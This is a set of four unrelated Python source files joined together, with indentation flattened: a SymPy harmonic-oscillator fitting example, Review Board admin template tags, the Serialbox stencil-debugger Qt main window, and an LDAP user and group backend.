all_steps = {}
for n in range(basis_dimension):
hydro_approx += basis_ho[n](grid)*coeffs[n]
all_steps[n] = hydro_approx.copy()
if pylab:
line = pylab.plot(grid, all_steps[n], ':', label='max n = %i' % n)
# check error numerically
diff = np.max(np.abs(hydro_approx - H_ufunc(grid)))
print "Error estimate: the element with largest deviation misses by %f" % diff
if diff > 0.01:
print "This is much, try to increase the basis size or adjust omega"
else:
print "Ah, that's a pretty good approximation!"
# Check visually
if pylab:
print "Here's a plot showing the contribution for each n"
line[0].set_linestyle('-')
pylab.plot(grid, H_ufunc(grid), 'r-', label='exact')
pylab.legend()
pylab.show()
print """Note:
These binary integrators were specialized to find coefficients for a
harmonic oscillator basis, but they can process any wave function as long
as it is available as a vector and defined on a grid with equidistant
points. That is, on any grid you get from numpy.linspace.
To make the integrators even more flexible, you can setup the harmonic
oscillator solutions with symbolic parameters omega and l. Then the
autowrapped binary routine will take these scalar variables as arguments,
so that the integrators can find coefficients for *any* isotropic harmonic
oscillator basis.
"""
if __name__ == '__main__':
main()
| |
from __future__ import unicode_literals
import re
from django import template
from django.contrib import messages
from django.contrib.admin.templatetags.admin_urls import (
add_preserved_filters,
admin_urlname,
admin_urlquote)
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.template.context import RequestContext
from django.utils import six
from django.utils.safestring import mark_safe
from djblets.util.templatetags.djblets_js import json_dumps_items
from reviewboard import get_version_string
from reviewboard.admin.forms.change_form import ChangeFormFieldset
from reviewboard.hostingsvcs.models import HostingServiceAccount
from reviewboard.notifications.models import WebHookTarget
from reviewboard.oauth.models import Application
from reviewboard.reviews.models import DefaultReviewer, Group
from reviewboard.scmtools.models import Repository
from reviewboard.site.urlresolvers import local_site_reverse
register = template.Library()
@register.inclusion_tag('admin/subnav_item.html', takes_context=True)
def admin_subnav(context, url_name, name, icon=""):
"""Return an <li> containing a link to the desired setting tab."""
request = context.get('request')
url = local_site_reverse(url_name, request=request)
return RequestContext(
request, {
'url': url,
'name': name,
'current': request is not None and url == request.path,
'icon': icon,
})
@register.inclusion_tag('admin/sidebar.html', takes_context=True)
def admin_sidebar(context):
"""Render the admin sidebar.
This includes the configuration links and setting indicators.
"""
request = context.get('request')
request_context = {
'count_users': User.objects.count(),
'count_review_groups': Group.objects.count(),
'count_default_reviewers': DefaultReviewer.objects.count(),
'count_oauth_applications': Application.objects.count(),
'count_repository': Repository.objects.accessible(
request.user, visible_only=False).count(),
'count_webhooks': WebHookTarget.objects.count(),
'count_hosting_accounts': HostingServiceAccount.objects.count(),
'version': get_version_string(),
}
# We're precomputing URLs in here, rather than computing them in the
# template, because we need to always ensure that reverse() will be
# searching all available URL patterns and not just the ones bound to
# request.current_app.
#
# current_app gets set by AdminSite views, and if we're in an extension's
# AdminSite view, we'll fail to resolve these URLs from within the
# template. We don't have that problem if calling reverse() ourselves.
request_context.update({
'url_%s' % url_name: reverse('admin:%s' % url_name)
for url_name in ('auth_user_add',
'auth_user_changelist',
'hostingsvcs_hostingserviceaccount_add',
'hostingsvcs_hostingserviceaccount_changelist',
'notifications_webhooktarget_add',
'notifications_webhooktarget_changelist',
'oauth_application_add',
'oauth_application_changelist',
'reviews_defaultreviewer_add',
'reviews_defaultreviewer_changelist',
'reviews_group_add',
'reviews_group_changelist',
'scmtools_repository_add',
'scmtools_repository_changelist')
})
return RequestContext(request, request_context)
@register.simple_tag
def alert_css_classes_for_message(message):
"""Render the CSS classes for a rb-c-alert from a Django Message.
This helps to craft an alert that reflects the status of a
:py:class:`~django.contrib.messages.storage.base.Message`.
This will include a CSS modifier class reflecting the status of the
message and any extra tags defined on the message.
Args:
message (django.contrib.messages.storage.base.Message):
The message to render classes for.
Returns:
unicode:
A space-separated list of classes.
"""
status_class = {
messages.DEBUG: '-is-info',
messages.INFO: '-is-info',
messages.SUCCESS: '-is-success',
messages.WARNING: '-is-warning',
messages.ERROR: '-is-error',
}[message.level]
if message.extra_tags:
return '%s %s' % (status_class, message.extra_tags)
return status_class
@register.filter
def split_error_title_text(error):
"""Split an exception's text into a title and body text.
Args:
error (Exception):
The error containing text to split.
Returns:
tuple:
A tuple containing:
1. The title text.
2. The rest of the error message (or ``None``).
"""
return six.text_type(error).split('\n', 1)
@register.simple_tag()
def process_result_headers(result_headers):
"""Process a Django ChangeList's result headers to aid in rendering.
This will provide better information for our template so that we can
more effectively render a datagrid.
Args:
result_headers (list of dict):
The result headers to modify.
"""
class_attrib_re = re.compile(r'\s*class="([^"]+)"')
for header in result_headers:
m = class_attrib_re.match(header['class_attrib'])
if m:
class_value = m.groups(1)[0]
else:
class_value = ''
if class_value != 'action-checkbox-column':
class_value = 'has-label %s' % class_value
header['class_attrib'] = \
mark_safe(' class="datagrid-header %s"' % class_value)
if header['sortable'] and header['sort_priority'] > 0:
if header['ascending']:
sort_order = 'asc'
else:
sort_order = 'desc'
if header['sort_priority'] == 1:
sort_priority = 'primary'
else:
sort_priority = 'secondary'
header['sort_icon'] = 'datagrid-icon-sort-%s-%s' % (
sort_order, sort_priority)
return ''
@register.simple_tag(takes_context=True)
def changelist_js_model_attrs(context):
"""Return serialized JSON attributes for the RB.Admin.ChangeListPage model.
These will all be passed to the :js:class:`RB.Admin.ChangeListPage`
constructor.
Args:
context (django.template.Context):
The context for the page.
Returns:
django.utils.safestring.SafeText:
A string containing the JSON attributes for the page model.
"""
action_form = context.get('action_form')
cl = context['cl']
model_data = {
'modelName': cl.opts.verbose_name,
'modelNamePlural': cl.opts.verbose_name_plural,
}
if action_form is not None:
action_choices = action_form.fields['action'].choices
model_data['actions'] = [
{
'id': action_id,
'label': action_label,
}
for action_id, action_label in action_choices
if action_id
]
return json_dumps_items(model_data)
@register.inclusion_tag('admin/submit_line.html', takes_context=True)
def change_form_submit_buttons(context):
"""Return HTML for a change form's submit buttons.
This will compute the correct set of Save/Delete buttons, based on whether
this is rendering for a Django admin change form (taking into account
the object's state and user's permissions) or for any other type of form.
Args:
context (django.template.Context):
The context for the page.
Returns:
django.utils.safestring.SafeText:
A string containing the submit buttons.
"""
show_save = context.get('show_save', True)
delete_url = None
if 'change' in context:
change = context['change']
is_popup = context['is_popup']
show_delete = context.get('show_delete', True)
if is_popup:
show_delete = False
show_save_as_new = False
show_save_and_add_another = False
show_save_and_continue = False
else:
save_as = context['save_as']
opts = context['opts']
original = context['original']
show_delete = (
change and
context.get('show_delete', True) and
context['has_delete_permission'])
show_save_as_new = (
save_as and
change)
show_save_and_add_another = (
(not save_as or context['add']) and
context['has_add_permission'])
show_save_and_continue = (
context.get('show_save_and_continue', True) and
context['has_change_permission'])
if show_delete:
assert original is not None
delete_url = add_preserved_filters(
context,
reverse(admin_urlname(opts, 'delete'),
args=[admin_urlquote(original.pk)]))
else:
delete_url = context.get('delete_url', '#')
show_delete = context.get('show_delete', False)
show_save_as_new = context.get('show_save_as_new', False)
show_save_and_add_another = context.get('show_save_and_add_another',
False)
show_save_and_continue = context.get('show_save_and_continue', False)
return {
'delete_url': delete_url,
'show_delete_link': show_delete,
'show_save': show_save,
'show_save_and_add_another': show_save_and_add_another,
'show_save_and_continue': show_save_and_continue,
'show_save_as_new': show_save_as_new,
}
@register.filter
def change_form_fieldsets(admin_form):
"""Iterate through all fieldsets in an administration change form.
This will provide each field as a
:py:class:`~reviewboard.admin.forms.change_form.ChangeFormFieldset`.
Args:
admin_form (django.contrib.admin.helpers.AdminForm):
The administration form.
Yields:
reviewboard.admin.forms.change_form.ChangeFormFieldset:
Each fieldset in the form.
"""
form = admin_form.form
readonly_fields = admin_form.readonly_fields
model_admin = admin_form.model_admin
for name, options in admin_form.fieldsets:
yield ChangeFormFieldset(form=form,
name=name,
readonly_fields=readonly_fields,
model_admin=model_admin,
**options)
@register.simple_tag(takes_context=True)
def render_change_form_fieldset(context, fieldset):
"""Render a Change Form fieldset.
This will render a
:py:class:`~reviewboard.admin.forms.change_form.ChangeFormFieldset` to
HTML.
Args:
context (django.template.Context):
The current template context.
fieldset (reviewboard.admin.forms.change_form.ChangeFormFieldset):
The fieldset to render.
Returns:
django.utils.safestring.SafeText:
The resulting HTML for the fieldset.
"""
return fieldset.render(context)
| |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
##===-----------------------------------------------------------------------------*- Python -*-===##
##
## S E R I A L B O X
##
## This file is distributed under terms of BSD license.
## See LICENSE.txt for more information.
##
##===------------------------------------------------------------------------------------------===##
from os import getcwd
from time import time
from PyQt5.QtCore import QFileSystemWatcher, QUrl, Qt
from PyQt5.QtGui import QDesktopServices
from PyQt5.QtWidgets import (QMainWindow, QDesktopWidget, QAction, QTabWidget, QMessageBox,
QFileDialog)
from sdbcore.logger import Logger
from sdbcore.serializerdata import SerializerData
from sdbcore.stencildata import StencilData
from sdbcore.stencilfieldmapper import StencilFieldMapper
from sdbcore.version import Version
from sdbgui.errorwindow import ErrorWindow
from sdbgui.globalconfig import GlobalConfig
from sdbgui.icon import Icon
from sdbgui.popupaboutwidget import PopupAboutWidget
from sdbgui.resultwindow import ResultWindow
from sdbgui.sessionmanager import SessionManager
from sdbgui.setupwindow import SetupWindow
from sdbgui.stencilwindow import StencilWindow
from sdbgui.tabstate import TabState
class MainWindow(QMainWindow):
OnlineHelpUrl = QUrl("https://eth-cscs.github.io/serialbox2/sdb.html")
def __init__(self):
super().__init__()
Logger.info("Setup main window")
self.__input_serializer_data = SerializerData("Input Serializer")
self.__input_stencil_data = StencilData(self.__input_serializer_data)
self.__reference_serializer_data = SerializerData("Reference Serializer")
self.__reference_stencil_data = StencilData(self.__reference_serializer_data)
self.__stencil_field_mapper = StencilFieldMapper(self.__input_stencil_data,
self.__reference_stencil_data,
GlobalConfig()["async"])
self.__file_system_watcher = QFileSystemWatcher()
self.__file_system_watcher.directoryChanged[str].connect(self.popup_reload_box)
self.__file_system_watcher_last_modify = time()
# Load from session?
self.__session_manager = SessionManager()
if GlobalConfig()["default_session"]:
self.__session_manager.load_from_file()
self.__session_manager.set_serializer_data(self.__input_serializer_data)
self.__session_manager.set_serializer_data(self.__reference_serializer_data)
# Setup GUI
self.setWindowTitle('sdb - stencil debugger (%s)' % Version().sdb_version())
self.resize(1200, 600)
if GlobalConfig()["center_window"]:
self.center()
if GlobalConfig()["move_window"]:
self.move(GlobalConfig()["move_window"])
self.setWindowIcon(Icon("logo-small.png"))
self.init_menu_tool_bar()
# Tabs
self.__tab_highest_valid_state = TabState.Setup
self.__widget_tab = QTabWidget(self)
# Setup tab
self.__widget_tab.addTab(
SetupWindow(self, self.__input_serializer_data, self.__reference_serializer_data),
"Setup")
# Stencil tab
self.__widget_tab.addTab(
StencilWindow(self, self.__stencil_field_mapper, self.__input_stencil_data,
self.__reference_stencil_data),
"Stencil")
# Result tab
self.__widget_tab.addTab(
ResultWindow(self, self.__widget_tab.widget(TabState.Stencil.value),
self.__stencil_field_mapper),
"Result")
# Error tab
self.__widget_tab.addTab(ErrorWindow(self), "Error")
self.__widget_tab.currentChanged.connect(self.switch_to_tab)
self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
self.__widget_tab.setTabEnabled(TabState.Stencil.value, False)
self.__widget_tab.setTabEnabled(TabState.Result.value, False)
self.__widget_tab.setTabEnabled(TabState.Error.value, False)
self.__widget_tab.setTabToolTip(TabState.Setup.value,
"Setup Input and Refrence Serializer")
self.__widget_tab.setTabToolTip(TabState.Stencil.value,
"Set the stencil to compare and define the mapping of the fields")
self.__widget_tab.setTabToolTip(TabState.Result.value,
"View to comparison result")
self.__widget_tab.setTabToolTip(TabState.Error.value,
"Detailed error desscription of the current field")
self.__tab_current_state = TabState.Setup
self.set_tab_highest_valid_state(TabState.Setup)
self.switch_to_tab(TabState.Setup)
self.setCentralWidget(self.__widget_tab)
# If the MainWindow is closed, kill all popup windows
self.setAttribute(Qt.WA_DeleteOnClose)
Logger.info("Starting main loop")
self.show()
def init_menu_tool_bar(self):
Logger.info("Setup menu toolbar")
action_exit = QAction("Exit", self)
action_exit.setShortcut("Ctrl+Q")
action_exit.setStatusTip("Exit the application")
action_exit.triggered.connect(self.close)
action_about = QAction("&About", self)
action_about.setStatusTip("Show the application's About box")
action_about.triggered.connect(self.popup_about_box)
action_save_session = QAction(Icon("filesave.png"), "&Save", self)
action_save_session.setStatusTip("Save current session")
action_save_session.setShortcut("Ctrl+S")
action_save_session.triggered.connect(self.save_session)
action_open_session = QAction(Icon("fileopen.png"), "&Open", self)
action_open_session.setShortcut("Ctrl+O")
action_open_session.setStatusTip("Open session")
action_open_session.triggered.connect(self.open_session)
action_help = QAction(Icon("help.png"), "&Online Help", self)
action_help.setStatusTip("Online Help")
action_help.setToolTip("Online Help")
action_help.triggered.connect(self.go_to_online_help)
self.__action_continue = QAction(Icon("next_cursor.png"), "Continue", self)
self.__action_continue.setStatusTip("Continue to next tab")
self.__action_continue.triggered.connect(self.switch_to_next_tab)
self.__action_continue.setEnabled(True)
self.__action_back = QAction(Icon("prev_cursor.png"), "Back", self)
self.__action_back.setStatusTip("Back to previous tab")
self.__action_back.triggered.connect(self.switch_to_previous_tab)
self.__action_back.setEnabled(False)
self.__action_reload = QAction(Icon("step_in.png"), "Reload", self)
self.__action_reload.setStatusTip("Reload Input and Reference Serializer")
self.__action_reload.setShortcut("Ctrl+R")
self.__action_reload.triggered.connect(self.reload_serializer)
self.__action_reload.setEnabled(False)
self.__action_try_switch_to_error_tab = QAction(Icon("visualize.png"),
"Detailed error description", self)
self.__action_try_switch_to_error_tab.setStatusTip(
"Detailed error desscription of the current field")
self.__action_try_switch_to_error_tab.triggered.connect(self.try_switch_to_error_tab)
self.__action_try_switch_to_error_tab.setEnabled(False)
menubar = self.menuBar()
menubar.setNativeMenuBar(False)
self.statusBar()
file_menu = menubar.addMenu('&File')
file_menu.addAction(action_open_session)
file_menu.addAction(action_save_session)
file_menu.addAction(action_exit)
edit_menu = menubar.addMenu('&Edit')
edit_menu.addAction(self.__action_back)
edit_menu.addAction(self.__action_continue)
edit_menu.addAction(self.__action_reload)
help_menu = menubar.addMenu('&Help')
help_menu.addAction(action_about)
help_menu.addAction(action_help)
toolbar = self.addToolBar("Toolbar")
toolbar.addAction(action_help)
toolbar.addAction(action_open_session)
toolbar.addAction(action_save_session)
toolbar.addAction(self.__action_back)
toolbar.addAction(self.__action_continue)
toolbar.addAction(self.__action_reload)
toolbar.addAction(self.__action_try_switch_to_error_tab)
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
self.__session_manager.update_serializer_data(self.__input_serializer_data)
self.__session_manager.update_serializer_data(self.__reference_serializer_data)
if GlobalConfig()["default_session"]:
self.__session_manager.store_to_file()
# ===----------------------------------------------------------------------------------------===
# TabWidgets
# ==-----------------------------------------------------------------------------------------===
def tab_widget(self, idx):
return self.__widget_tab.widget(idx if not isinstance(idx, TabState) else idx.value)
def switch_to_tab(self, tab):
idx = tab.value if isinstance(tab, TabState) else tab
if self.__tab_current_state == TabState(idx):
return
Logger.info("Switching to %s tab" % TabState(idx).name)
self.__tab_current_state = TabState(idx)
self.__widget_tab.setCurrentIndex(idx)
self.tab_widget(idx).make_update()
self.__action_try_switch_to_error_tab.setEnabled(TabState(idx) == TabState.Result)
# Error tab is always disabled if not in "Error"
self.__widget_tab.setTabEnabled(TabState.Error.value, TabState(idx) == TabState.Error)
# First tab
if idx == 0:
self.__action_continue.setEnabled(True)
self.__action_back.setEnabled(False)
# Last tab
elif idx == self.__widget_tab.count() - 1:
self.__action_continue.setEnabled(False)
self.__action_back.setEnabled(True)
# Middle tab
else:
self.__action_continue.setEnabled(True)
self.__action_back.setEnabled(True)
def set_tab_highest_valid_state(self, state):
"""Set the state at which the data is valid i.e everything <= self.valid_tab_state is valid
"""
self.__tab_highest_valid_state = state
self.enable_tabs_according_to_tab_highest_valid_state()
def enable_tabs_according_to_tab_highest_valid_state(self):
"""Enable/Disable tabs according to self.__tab_highest_valid_state
"""
if self.__tab_highest_valid_state == TabState.Setup:
self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
self.__widget_tab.setTabEnabled(TabState.Stencil.value, False)
self.__widget_tab.setTabEnabled(TabState.Result.value, False)
self.__widget_tab.setTabEnabled(TabState.Error.value, False)
self.__action_try_switch_to_error_tab.setEnabled(False)
watched_directories = self.__file_system_watcher.directories()
if watched_directories:
self.__file_system_watcher.removePaths(self.__file_system_watcher.directories())
elif self.__tab_highest_valid_state == TabState.Stencil:
self.__file_system_watcher.addPath(self.__input_serializer_data.serializer.directory)
self.__file_system_watcher.addPath(self.__reference_stencil_data.serializer.directory)
self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
self.__widget_tab.setTabEnabled(TabState.Result.value, False)
self.__widget_tab.setTabEnabled(TabState.Error.value, False)
self.__widget_tab.widget(TabState.Stencil.value).initial_field_match()
self.__action_reload.setEnabled(True)
self.__action_try_switch_to_error_tab.setEnabled(False)
elif self.__tab_highest_valid_state == TabState.Result:
self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
self.__widget_tab.setTabEnabled(TabState.Result.value, True)
self.__widget_tab.setTabEnabled(TabState.Error.value, True)
self.__action_try_switch_to_error_tab.setEnabled(True)
elif self.__tab_highest_valid_state == TabState.Error:
self.__widget_tab.setTabEnabled(TabState.Setup.value, True)
self.__widget_tab.setTabEnabled(TabState.Stencil.value, True)
self.__widget_tab.setTabEnabled(TabState.Result.value, True)
self.__action_try_switch_to_error_tab.setEnabled(False)
def switch_to_next_tab(self):
self.__widget_tab.currentWidget().make_continue()
def switch_to_previous_tab(self):
self.__widget_tab.currentWidget().make_back()
def try_switch_to_error_tab(self):
if self.__widget_tab.widget(TabState.Result.value).try_switch_to_error_tab():
self.__widget_tab.setTabEnabled(TabState.Error.value, True)
def error_window_set_result_data(self, result_data):
self.__widget_tab.widget(TabState.Error.value).set_result_data(result_data)
# ===----------------------------------------------------------------------------------------===
# PopupWidgets
# ==-----------------------------------------------------------------------------------------===
def popup_about_box(self):
self.__about_widget = PopupAboutWidget(self)
def popup_error_box(self, msg):
Logger.error(
msg.replace("<b>", "").replace("</b>", "").replace("<br />", ":").replace("<br/>", ":"))
msg_box = QMessageBox()
msg_box.setWindowTitle("Error")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setText(msg)
msg_box.setStandardButtons(QMessageBox.Ok)
reply = msg_box.exec_() # Blocking
def popup_reload_box(self, path):
self.__file_system_watcher.blockSignals(True)
reply = QMessageBox.question(self, "Reload serializer?",
"The path \"%s\" has changed.\nDo want to reload the serializers?" % path,
QMessageBox.Yes | QMessageBox.No,
QMessageBox.Yes)
if reply == QMessageBox.Yes:
self.reload_serializer()
self.__file_system_watcher.blockSignals(False)
# ===----------------------------------------------------------------------------------------===
# Session manager
# ==-----------------------------------------------------------------------------------------===
def save_session(self):
Logger.info("Try saving current session")
dialog = QFileDialog(self, "Save current session")
dialog.setAcceptMode(QFileDialog.AcceptSave)
dialog.setDefaultSuffix("json")
dialog.setDirectory(getcwd())
if not dialog.exec_():
Logger.info("Abort saving current session")
return
filename = dialog.selectedFiles()
self.__session_manager.update_serializer_data(self.__input_serializer_data)
self.__session_manager.update_serializer_data(self.__reference_serializer_data)
ret, msglist = self.__session_manager.store_to_file(filename[0])
if not ret:
self.popup_error_box(
"Failed to save configuration file: %s\n%s " % (filename[0], msglist[0]))
def open_session(self):
Logger.info("Try opening session")
filename = QFileDialog.getOpenFileName(self, "Open Session", getcwd(),
"JSON configuration (*.json)")[0]
if filename is None or filename is "":
Logger.info("Abort opening session")
return
ret, msglist = self.__session_manager.load_from_file(filename)
if not ret:
self.popup_error_box(
"Failed to load configuration file: %s\n%s " % (filename, msglist[0]))
else:
Logger.info("Successfully opened session")
self.__session_manager.set_serializer_data(self.__input_serializer_data)
self.__session_manager.set_serializer_data(self.__reference_serializer_data)
self.switch_to_tab(TabState.Setup)
@property
def session_manager(self):
return self.__session_manager
# ===----------------------------------------------------------------------------------------===
# Reload Serializer
# ==-----------------------------------------------------------------------------------------===
def reload_serializer(self):
Logger.info("Reloading serializers")
try:
self.__input_serializer_data.reload()
self.__reference_serializer_data.reload()
if self.__widget_tab.currentIndex() == TabState.Error.value:
self.switch_to_tab(TabState.Result)
self.__widget_tab.currentWidget().make_update()
except RuntimeError as e:
self.popup_error_box(str(e))
self.set_tab_highest_valid_state(TabState.Setup)
self.switch_to_tab(TabState.Setup)
self.__widget_tab.currentWidget().make_update()
# ===----------------------------------------------------------------------------------------===
# Online help
# ==-----------------------------------------------------------------------------------------===
def go_to_online_help(self):
Logger.info("Opening online help")
QDesktopServices.openUrl(MainWindow.OnlineHelpUrl)
| |
from coco.contract.backends import GroupBackend, UserBackend
from coco.contract.errors import *
import ldap
from passlib.hash import ldap_md5_crypt
# TODO: delete private group of user on user delete
class LdapBackend(GroupBackend, UserBackend):
"""
Group- and UserBackend implementation communicating with an LDAP server.
Implemented by looking at the following sources:
https://www.packtpub.com/books/content/python-ldap-applications-part-1-installing-and-configuring-python-ldap-library-and-bin
https://www.packtpub.com/books/content/python-ldap-applications-part-3-more-ldap-operations-and-ldap-url-library
The LDAP record values are mapped as follow:
- cn -> GroupBackend.FIELD_PK
- cn -> UserBackend.FIELD_PK
- gidNumber -> GroupBackend.FIELD_ID
- uidNumber -> UserBackend.FIELD_ID
All other values are ignored from external sources.
On the internal server, records are stored as seen in 'create_group' and 'create_user'.
A small refactoring should probablly allow to define the primary key identifier ('cn' right now)
as a constructor argument.
"""
def __init__(self, server, base_dn, users_dn=None, groups_dn=None, readonly=False):
"""
Initialize a new LDAP backend.
:param server: The LDAP server's address.
:param base_dn: The DN to work in.
:param users_dn: The DN to use for user related operations (relative to `base_dn`).
:param groups_dn: The DN to use for group related operations (relative to `base_dn`).
:param readonly: Either the server is read-only or not.
"""
if "ldap://" not in server:
server = "ldap://" + server
self.base_dn = base_dn
self.groups_dn = groups_dn
self.readonly = readonly
self.server = server
self.users_dn = users_dn
def add_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
if not self.user_exists(user):
raise UserNotFoundError
if not self.is_group_member(group, user):
dn = self.get_full_group_dn(group)
mod_attrs = [
(ldap.MOD_ADD, 'memberUid', [str(user)])
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
return True
except Exception as ex:
raise GroupBackendError(ex)
return False
def auth_user(self, user, password, **kwargs):
"""
:inherit.
"""
if not self.user_exists(user):
raise UserNotFoundError
try:
user_ldap = LdapBackend(self.server, self.base_dn, self.users_dn)
user_ldap.connect({
'dn': user_ldap.get_full_user_dn(user),
'password': password
})
user_ldap.disconnect()
return self.get_user(user)
except AuthenticationError as ex:
raise ex
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def connect(self, credentials, **kwargs):
"""
:inherit.
"""
dn = credentials.get('dn')
if dn is None:
username = credentials.get('username')
else:
username = dn
try:
self.cnx = ldap.initialize(self.server)
self.cnx.bind_s(str(username), str(credentials.get('password')))
except ldap.INVALID_CREDENTIALS as ex:
raise AuthenticationError(ex)
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def create_group(self, gid, name, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
# TODO: check if such a group already exists
record = [
('objectclass', [
'posixGroup',
'top'
]),
('cn', [str(name)]),
('gidNumber', [str(gid)])
]
dn = self.get_full_group_dn(name)
try:
self.cnx.add_s(str(dn), record)
group = {}
# TODO: add more fields
group[GroupBackend.FIELD_ID] = gid
group[GroupBackend.FIELD_PK] = name
return group
except Exception as ex:
raise GroupBackendError(ex)
def create_user(self, uid, username, password, gid, home_directory, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
# TODO: check if such a user already exists
dn = self.get_full_user_dn(username)
password = self.encrypt_password(password)
record = [
('objectclass', [
'person',
'organizationalperson',
'inetorgperson',
'posixAccount',
'top'
]),
('cn', [str(username)]),
('sn', [str(username)]),
('uid', [str(username)]),
('uidNumber', [str(uid)]),
('gidNumber', [str(gid)]), # FIXME: hmm..
('userPassword', [str(password)]),
('homeDirectory', [str(home_directory)]),
('loginShell', [str('/bin/bash')])
]
try:
self.cnx.add_s(str(dn), record)
user = {}
# TODO: add more fields
user[UserBackend.FIELD_ID] = uid
user[UserBackend.FIELD_PK] = username
return user
except Exception as ex:
raise UserBackendError(ex)
def delete_group(self, group, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
dn = self.get_full_group_dn(str(group))
try:
self.cnx.delete_s(dn)
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
def delete_user(self, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.user_exists(user):
raise UserNotFoundError
dn = self.get_full_user_dn(user)
try:
self.remove_user_from_all_groups(user)
self.cnx.delete_s(str(dn))
except BackendError as ex:
raise ex
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
def disconnect(self, **kwargs):
"""
:inherit.
"""
try:
self.cnx.unbind_s()
except ldap.LDAPError as ex:
raise ConnectionError(ex)
except Exception as ex:
raise UserBackendError(ex)
def encrypt_password(self, password):
"""
Encrypt the password before storing it in LDAP.
:param password: The password to encrypt.
"""
return ldap_md5_crypt.encrypt(password)
def get_full_dn(self, cn):
"""
TODO: write doc.
"""
return "%s,%s" % (cn, self.base_dn)
def get_full_group_dn(self, group):
"""
TODO: write doc.
"""
return self.get_full_dn("cn=%s,%s" % (group, self.groups_dn))
def get_full_user_dn(self, user):
"""
TODO: write doc.
"""
return self.get_full_dn("cn=%s,%s" % (user, self.users_dn))
def get_group(self, group, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + group
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
matches = len(result)
if matches == 0:
raise GroupNotFoundError
elif matches != 1:
raise GroupBackendError("Multiple groups found")
else:
group = result[0][1]
group[GroupBackend.FIELD_ID] = int(group.get('gidNumber')[0])
group[GroupBackend.FIELD_PK] = group.get('cn')[0]
return group
def get_group_members(self, group, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
result = None
dn = self.get_full_group_dn(group)
try:
result = self.cnx.read_s(str(dn))
except ldap.NO_SUCH_OBJECT as ex:
raise GroupNotFoundError(ex)
except Exception as ex:
raise GroupBackendError(ex)
members = []
for user in result.get('memberUid', []):
members.append(self.get_user(user))
return members
def get_groups(self, **kwargs):
"""
:inherit.
"""
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_ONELEVEL
try:
# get list of groups and remove dn, to only have dicts in the list
# lda.SCOPE_ONELEVEL == 1, search only childs of dn
groups = map(lambda x: x[1], self.cnx.search_s(str(base), scope))
for group in groups:
group[UserBackend.FIELD_ID] = int(group.get('gidNumber')[0])
group[UserBackend.FIELD_PK] = group.get('cn')[0]
return groups
except Exception as e:
raise GroupBackendError(e)
def get_user(self, user, **kwargs):
"""
:inherit.
"""
if not self.user_exists(user):
raise UserNotFoundError
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + user
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
except ldap.NO_SUCH_OBJECT as ex:
raise UserNotFoundError(ex)
except Exception as ex:
raise UserBackendError(ex)
matches = len(result)
if matches == 0:
raise UserNotFoundError("No matching users found.")
elif matches != 1:
raise UserBackendError("Multiple users found.")
else:
user = result[0][1]
user[UserBackend.FIELD_ID] = int(user.get('uidNumber')[0])
user[UserBackend.FIELD_PK] = user.get('cn')[0]
return user
def get_users(self, **kwargs):
"""
:inherit.
"""
base = self.get_full_dn(self.users_dn)
scope = ldap.SCOPE_ONELEVEL
try:
# get list of users and remove dn, to only have dicts in the list
# lda.SCOPE_ONELEVEL == 1, search only childs of dn
users = map(lambda x: x[1], self.cnx.search_s(str(base), scope))
for user in users:
user[UserBackend.FIELD_ID] = int(user.get('uidNumber')[0])
user[UserBackend.FIELD_PK] = user.get('cn')[0]
return users
except Exception as e:
raise UserBackendError(e)
def group_exists(self, group):
"""
:inherit.
"""
base = self.get_full_dn(self.groups_dn)
scope = ldap.SCOPE_SUBTREE
s_filter = 'cn=' + group
result = None
try:
result = self.cnx.search_s(str(base), scope, filterstr=str(s_filter))
return len(result) != 0
except ldap.NO_SUCH_OBJECT as ex:
return False
except Exception as ex:
raise GroupBackendError(ex)
def is_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if not self.group_exists(group):
raise GroupNotFoundError
if not self.user_exists(user):
raise UserNotFoundError
members = self.get_group_members(group)
return next((m for m in members if user == m.get(UserBackend.FIELD_PK)), False) is not False
def remove_group_member(self, group, user, **kwargs):
"""
:inherit.
"""
if self.readonly:
raise ReadOnlyError
if not self.group_exists(group):
raise GroupNotFoundError
if self.is_group_member(group, user):
dn = self.get_full_group_dn(group)
mod_attrs = [
(ldap.MOD_DELETE, 'memberUid', [str(user)])
]
try:
self.cnx.modify_s(str(dn), mod_attrs)
return True
except Exception as ex:
raise GroupBackendError(ex)
return False
